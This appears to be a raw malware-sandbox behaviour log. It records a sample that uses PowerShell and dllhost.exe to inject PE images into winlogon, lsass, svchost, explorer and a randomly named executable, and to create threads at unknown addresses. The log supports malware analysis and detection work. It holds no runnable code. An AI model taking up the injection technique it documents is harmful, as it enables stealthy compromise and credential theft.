Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AA482AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8C3B2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D6E02AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 89782AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2FC2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32B92AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 70BC2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1DCE2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D0E62AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D0C2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BAA02AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A1C2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1DA52AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15F82AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 227D2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C69D2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9F942AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D52AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CD002AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5EF02AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D7592AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD3A2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82952AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A7D32AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E6FB2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6DF42AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 88C82AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9D352AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 646A2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5DAF2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 36732AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 623A2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7C752AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3482AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6CAD2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8A822AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 393220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EA82AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 32EF2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EED2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C4F2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 308220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E7220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F6220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F9220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12F220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 307220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 150220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 16C220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D5220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 110220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 129220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C9220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F9220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 27A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 146220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 149220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A9220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2D4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CC220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 164220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C8220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F1220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 250220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 28A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 241220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 132220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 110220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 29F220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 145220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C8220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 155220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 144220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14B220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2C4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 112220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 308220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2B4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 245220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 159220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AA220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 110220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 116220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 118220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A7220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F2220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 127220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2A2220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B7220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2F2220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F5220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B4220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 116220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 92220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 79220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F6220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9C220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12D220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E1220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10B220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 111220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DB220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14E220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D8220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 103220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 121220C
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53D22AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1CC82AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8BC12AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA3B2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D1DD2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2BE2AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 86B52AD0
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6B062AD0

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 18AF9660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6CEB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2566C210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 1A529D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 219CA930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D42C7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CB5EA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15D2A5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 217A5190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 163A9860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EA17CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 286D60C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2355A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C8C17A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CC85180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E23A7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 218029B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2275E2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 10619B50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 242BD150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E0C0590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C68DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2603EBB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19ABD960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E94DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18C3C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2893F330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 278C0860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18874FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13D0CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C8F7DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1740E110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EDAA480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA8C3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 216D6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29689780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15DD2FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22832B90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2FC70BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19D1DCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5D0E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2399D0C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1F8BAA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2189A1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D1DA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DD15F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 2B9227D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 291C69D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24C9F940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 205CD000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F65EF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E3D7590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1DABD3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21982950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C0A7D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 223E6FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1826DF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 23288C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A9D350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EC646A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 21E5DAF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F336730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 179623A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1837C750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19B03480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2136CAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1638A820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1EF0EA80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1EC32EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20EED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1A99C4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 12F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 3070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 16C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1290000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 27A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: A90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 26A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 28A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 2410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 29F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\hbdllTMojnrxYOddEOXLwvhpFsNKlYxzwpWZSSWfXZRHJkhYT\oQZjCnabn3NZNaAFlvzBKb.exe base: C80000 value starts with: 4D5A
